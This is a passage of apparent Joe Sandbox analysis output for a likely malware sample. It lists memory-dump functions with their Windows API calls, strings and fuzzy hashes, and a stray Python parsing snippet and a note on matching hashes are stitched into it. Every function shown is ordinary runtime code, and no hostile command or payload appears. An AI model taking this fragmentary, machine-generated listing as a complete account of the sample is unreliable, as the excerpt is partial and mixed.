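• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00224EFA
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 1518329722-0
• Opcode ID: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
• Opcode Fuzzy Hash: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
• Instruction Fuzzy Hash: 64F02DB1A102257B4724EFADEA0489EBEE9EFC57707254155F809D3754E570DD01C790
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
Similarity
• API ID:
• String ID: Z !$Z !
• API String ID: 0-1985138166
• Instruction Fuzzy Hash: DBF12972E1021A9FCF08CFA8D991AEDB7F2BF98310F248169E455A7344D734AE55CB60
"""

if __name__ == "__main__":
    for rec in parse_blocks(SAMPLE):
        print(rec.fields["API String ID"], [(n, hex(r)) for n, r in rec.rvas()], rec.strings)
```

Note what the two halves of `API String ID` tell you in the blocks above: the first number is zero when `API ID` is empty and the second is zero when `String ID` is empty, so a value like `1518329722-0` depends only on the API names and will match any function with the same call set, including the same C runtime routine in unrelated binaries. For matching beyond one sample, pivot on `Instruction Fuzzy Hash` or `Opcode ID` as well.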

APIs
  • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
  • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002392D4
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 2b83d1c33d24948861b28e7d21184f36d74db822808daf71a3e720e67bceccf3
• Instruction ID: ae98a59576645038fa09e374e265cd9c02b611a5a2b8999c0bc1e9388eeebcd7
• Opcode Fuzzy Hash: 2b83d1c33d24948861b28e7d21184f36d74db822808daf71a3e720e67bceccf3
                                                                                                                                                                                            • Instruction Fuzzy Hash: C02198F2A60207ABEB189E15DC45ABA73ACEF56314F1400BAFD05D7181E7B4DDA4CB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C272: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0021C316,000000FF,00000000,0021C315,00000000,00000000,?,?,?,?,0021C316,?), ref: 0021C2A8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharH_prolog3_MultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1474283020-0
                                                                                                                                                                                            • Opcode ID: efc4173355e1b9123d87d05a72004fd05870dcfefa6430e4461de022cb495d9c
                                                                                                                                                                                            • Instruction ID: 34d759998a05c1d7466c8220b72391e6bf7a3912a2c5e94d54f37878fc1dda77
                                                                                                                                                                                            • Opcode Fuzzy Hash: efc4173355e1b9123d87d05a72004fd05870dcfefa6430e4461de022cb495d9c
                                                                                                                                                                                            • Instruction Fuzzy Hash: E6219572D6122DA7CB24EBA4CC8ABCD77B8AF10310F5045D1A618A7182DB746FD5CF90
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                                                            • Opcode ID: 1dc17a8e16918fc5b4d92e11e225e9c2090c7f55ee3fa5afe13d2d34ddbb0f15
                                                                                                                                                                                            • Instruction ID: 597b846841f10739795c2d9283cae4926c4977ed20ecb9300ba103739cbae599
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc17a8e16918fc5b4d92e11e225e9c2090c7f55ee3fa5afe13d2d34ddbb0f15
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D19E71A1126A9FCB25CF288C407EDFB70AF65300F1481EAD559B7782D6709EA4CFA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00239020,00000001,00000000,?,-00000050,?,00239661,00000000,?,?,?,00000055,?), ref: 00238F64
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: ac9be98134973c22707dfc7596dd006a7baaaeb09e6bd3914f6d80ae2b413040
                                                                                                                                                                                            • Instruction ID: 1687b905932992fc1c3a70a7faf242073a9200a1723d8ced378a96cdad2673a5
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9be98134973c22707dfc7596dd006a7baaaeb09e6bd3914f6d80ae2b413040
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1011297B2203019FDB189F39D89157AB792FF80318F54442DF9468BB40D771B852CB40
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0023923C,00000000,00000000,?), ref: 002394DB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: f995d587b6c55d809c5f313051f40c69a4ce2288b1b05db3fc3565370fda5999
                                                                                                                                                                                            • Instruction ID: c78bde540150f2e8b7d494832ba0f9cc992584364be3db6891dec4bcd1b6fe80
                                                                                                                                                                                            • Opcode Fuzzy Hash: f995d587b6c55d809c5f313051f40c69a4ce2288b1b05db3fc3565370fda5999
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82012BB3630113ABDF185E6198066BB3758DB41354F044429FC06A3180EAB0FDE1CA90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00239280,00000001,00000000,?,-00000050,?,00239629,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00238FD7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: bc4cccc72025e7f6a6e5cdd1f9f99a9be157d25f5e15d96b6ac83825bfeadd74
                                                                                                                                                                                            • Instruction ID: 7f60e53c3ca83ea6364e248d4c7e932aa72570d8ef62cbe00ce91db156dfc1f4
                                                                                                                                                                                            • Opcode Fuzzy Hash: bc4cccc72025e7f6a6e5cdd1f9f99a9be157d25f5e15d96b6ac83825bfeadd74
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F046B62203045FCB145F35DC85E7ABB96EF82728F05802DF9498BA90CAB1AC11CB40
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0022E991: EnterCriticalSection.KERNEL32(?,?,0022BDC5,00000000,002577E8,0000000C,0022BD8D,?,?,002302D4,?,?,00231547,00000001,00000364,?), ref: 0022E9A0
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00231B70,00000001,00257AD8,0000000C,00231FA5,00000000), ref: 00231BB5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 268a19138a722c8a584a9f19cad455c3e9f5249818eb823be22fbf9f26c29461
• Instruction ID: 778523524f6edbd4e2ed1483628de37e5c4c9ac8dc6b42263269d9e20635a286
• Opcode Fuzzy Hash: 268a19138a722c8a584a9f19cad455c3e9f5249818eb823be22fbf9f26c29461
• Instruction Fuzzy Hash: 47F087B2A54304EFDB10DF98E806B8CBBF0FB0A722F00415AF404AB2A1DB7A49108F40
APIs
  • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
  • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
• EnumSystemLocalesW.KERNEL32(00238E00,00000001,00000000,?,?,00239683,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00238EDE
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: c7f0905c34649ea5197f2e1e497768878b6d7a29a0e813d5d99b757a05d2de6f
• Instruction ID: 6bdb09ddf5a15221569dc7607711c50cb9243cc73709c4a072b427ff12673293
• Opcode Fuzzy Hash: c7f0905c34649ea5197f2e1e497768878b6d7a29a0e813d5d99b757a05d2de6f
• Instruction Fuzzy Hash: FFF02B7A31030657CB159F76D84966ABF94EFC2710F06445DFE09CF691CA72D852C790
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0022E467,?,20001004,00000000,00000002,?,?,0022DA59), ref: 002320DD
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 4e0d53586a74ec713230813688b1b912c6b87d7e612dc30d2eed295db37e73db
• Instruction ID: 5a70d4b856b38e922774cc4ff8646537117ba7609a7fb8d1af148dcb5a19fe54
• Opcode Fuzzy Hash: 4e0d53586a74ec713230813688b1b912c6b87d7e612dc30d2eed295db37e73db
• Instruction Fuzzy Hash: CFE04F75511218FBCF122F60EC09EAE7F25EF45750F044011FC0965221CB728E34AA95
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001D550,0021D005), ref: 0021D53A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: f32df832ae2045babe11bbb37b7c3080727bcc79f7a2e03c942fbeb1df161b45
• Instruction ID: f1c5abfd0d0e82ac95c3a2e4130267ec287d0c9a9d1bf366c8d941ab14fc6bdc
• Opcode Fuzzy Hash: f32df832ae2045babe11bbb37b7c3080727bcc79f7a2e03c942fbeb1df161b45
• Instruction Fuzzy Hash:
Strings
Similarity
• API ID:
• String ID: PK
• API String ID: 0-443340723
• Opcode ID: 8d692baa89d95842a0aabdd76eb18694bba47f7ed83faee748b5527ff2f4f7af
• Instruction ID: 9179c74bee2cae6fff87220789eadb18211aabb99c7311bdd5bc6f74c9338a14
• Opcode Fuzzy Hash: 8d692baa89d95842a0aabdd76eb18694bba47f7ed83faee748b5527ff2f4f7af
• Instruction Fuzzy Hash: 0991BD31218B42AFD709CF28C840AAAFBA5FF95314F44461DF4A587692C731E964CFD6
Strings
Similarity
• API ID:
• String ID: i-8
• API String ID: 0-3871616529
• Opcode ID: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
• Instruction ID: 98a60bcdcffaa6f1e897c96ed21dc477bb7c69fd3c1c167264f917adede8326d
• Opcode Fuzzy Hash: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
• Instruction Fuzzy Hash: D2F096B35111283B5B1CDE65EC5ACBFB79DDB89260706412EFC0AAB180C920AC1085B4
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b89b3425908d80c50b42de7a67ab193db0859acfb694cfdbe637fbe3fa3b06cc
• Instruction ID: e092d349afbb46eed59e08f1d96b797c2929739a89ec0a60578b3da200f40c18
• Opcode Fuzzy Hash: b89b3425908d80c50b42de7a67ab193db0859acfb694cfdbe637fbe3fa3b06cc
• Instruction Fuzzy Hash: B5126774A20B22EFC719CF29C594668FBB4FF49310B60421AD65697B82D335B879CB90
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22e08377c55ee15222046d1f4e8f94786d6737c3e6351ddfd29771396e6732a1
• Instruction ID: 9ad296330e9c8baa5d4675f924a00d21bb77879919c2ba9c065acc0104d9747a
• Opcode Fuzzy Hash: 22e08377c55ee15222046d1f4e8f94786d6737c3e6351ddfd29771396e6732a1
• Instruction Fuzzy Hash: EE12B130A10B648FDB35CF29C8947EAB7F5BF95300F2448ADD59A57B92D631A9A4CF00
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b8961b9b7fb61cc723bdf3267792ed5758ef175de6f184371cea271f75f84d51
                                                                                                                                                                                            • Instruction ID: 7e1aebec1060c76b286175840336d35bf908181b0b98b0524d5d09fe5ad14419
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8961b9b7fb61cc723bdf3267792ed5758ef175de6f184371cea271f75f84d51
                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F11575E1070ACFCB24CFA9C8846AEBBF1FF48310F24856ED89AE3741D634A9558B54
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                            • Opcode ID: 6e5805fae1e8e41031a2bc05ae872c5f1766339c499eaf842439461290cc2557
                                                                                                                                                                                            • Instruction ID: b84eb3930eb83e743dd663e2311642441da320732c2071e48d986ceb0106614e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5805fae1e8e41031a2bc05ae872c5f1766339c499eaf842439461290cc2557
                                                                                                                                                                                            • Instruction Fuzzy Hash: E8B119B55207068BDB349F25CC92BB7B3A9EF44308F54446DF983CA680EEB5E995CB10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                            • Instruction ID: 26b8a72bd147c30dc3db3e5bba64abf51618eba6952eb49e52bfa0936a750f67
                                                                                                                                                                                            • Opcode Fuzzy Hash: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA519172D1022AEFDF04CF98C841AEEBBB2FF88304F598059E515AB241C775AA50CF90
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                            • Instruction ID: 77b282bd6ac5d8c61cb59a58e7d346c01834fca2dd9d447cefed7c94fdb474d1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA41B621229BC49FC739DE6C484009ABFE1DEB71407488A9DE4C7C7B43C614EA19C7A6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                            • Instruction ID: a2fbd2134991d09b88eca86981d183c68ace8b709a5844b27eacb59ef644c6a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31252231ABC68FC319CA9D5C40446FFA2AEB210038DCA9DD4DD9BB03C564E909C7B2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction ID: 333316db32f76ffac08694a1d937b3e55f1f95eda43df40169436302514e59df
                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21110BF722217363D6048EFDF4F46B7A396EBC5321B2D4377D0424B76AD222A9659500
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a990686b6d46b1b9f0493715a082d4f8a18f982f98cb27ff36edeb5967b6f730
                                                                                                                                                                                            • Instruction ID: efc366989b240f35216fda61b4e84706a50aead457113663928c06f252dc9c80
                                                                                                                                                                                            • Opcode Fuzzy Hash: a990686b6d46b1b9f0493715a082d4f8a18f982f98cb27ff36edeb5967b6f730
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43016C72E2407106F70C4B3AAC16436BB94A75732234743ABFA87EA0D2C419D535D7E4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
